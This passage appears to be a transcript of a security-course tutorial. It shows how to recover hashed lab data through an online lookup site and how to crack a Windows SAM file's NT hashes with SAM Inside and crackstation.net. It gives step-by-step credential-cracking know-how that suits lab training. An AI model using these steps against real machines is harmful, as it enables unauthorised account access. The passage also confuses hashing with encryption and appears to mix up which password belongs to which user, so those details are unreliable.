clicking Decoder. It will take a few minutes to get decrypted data because it has to calculate the hashes and get the original text. Now we discovered the original email as demo.test.com. We are currently experiencing internet connectivity issues, so we cannot obtain the decrypted text. Let's reconnect to the internet. Refresh the page, and by repeating the process, we will focus on decoding additional information. The IP address has been decoded as 192.168.1.100. The decryption part is working perfectly. As for the phone number, the decoding process reveals the phone number as 99999999990, which appears to be a randomly generated number. Similarly, decoding the username involves pasting the encrypted code and waiting for a specific duration due to the inclusion of special characters, such as lowercase and uppercase letters or numbers. As a result, we have identified the username as David123. The last one is the password, which is crucial. Let's try to decode it. Repeat the process, copy the encrypted code, and paste it on the decoder. Overall, the decryption process proceeds smoothly, providing the original text for each piece of information, including the phone number and username. This concludes the process performed by cryptographers and stenographers. In Task 8, a few pieces of data were encrypted with a WinRAR file, and a text file was obtained, which was encrypted. We decrypted that text file using an online tool such as MD5hashing.net in this task that allowed us to reveal the original information from the ciphertext. Let's begin with the 10th and final task of the project. In this task, the objective is to crack the SAM file. As a quick recap, the SAM file stores all the usernames and passwords of Windows machines. To accomplish this, we'll use a tool called SAM Inside, specifically designed to crack user passwords on Windows machines. We can use the provided SAM file in the SAM Inside tool. Now, upload the SAM file into the SAM Inside tool. Once uploaded, the tool will generate the encrypted hash files of the passwords. Now, let's go through the steps. We have the SAM and system files on the desktop, both of which are required to crack user passwords on Windows machines. The tool we're using is SAM Inside. Now, open SAM Inside, click on Import from SAM and System Registry Files, and open the SAM file from your desktop. It will prompt you for the system registry file in the same folder. Select the file and click on Open. Once both files are selected, the tool will display the user accounts, including their usernames, such as administrator, guest, attacker, Vishwa, and their corresponding unique IDs, which are 500, 501, 1000, and 1001. You'll notice NT hashes among the user accounts, representing the encrypted format of passwords. Some accounts are disabled by default. Here, the user administrator is empty, and the user guest is disabled. But for others like attacker and Vishwa, we have encrypted passwords that we aim to crack this encrypted text into normal text. To crack these passwords, we follow a process similar to that used in the decryption part. We identify the hash type, in this case NT hashes, and copy the hash for each user. For instance, to crack the password of the attacker, right-click on Attacker. Select Copy and choose NT hash. Now, paste the copied data on a notepad. Next, repeat the same process for the user Vishwa and copy the data into the notepad. Subsequently, we navigated to an online tool by searching Google for crackstation.net. This platform is renowned for its capability to crack various hashes, including LM hashes, NTLM hashes, MD5, SHA, MySQL, and more. Copy the hash file from Notepad and paste the hash into crackstation.net. Verify that you're not a robot by checking the box and clicking on Crack Hashes. The tool will then provide us with the clear text password associated with that hash. Note that the type is NTLM and the password is Vishwa123 under the Result tab. We repeat the identical process for the Vishwa user, involving the copy-pasting of the hash file, confirming the Not Robot box, completing the captcha verification, and ultimately clicking on Crack Hashes. The password I am hacker is discovered within the Results tab. It's important to note that there are multiple tools available for cracking SAM files, and besides SAM Inside, you can explore others like Offcrack, Password Manager, and many more. To find more tools, go to Google and research SAM password cracking tools. In conclusion, this is the process of cracking SAM files, revealing user passwords encrypted in NT hashes. Thank you.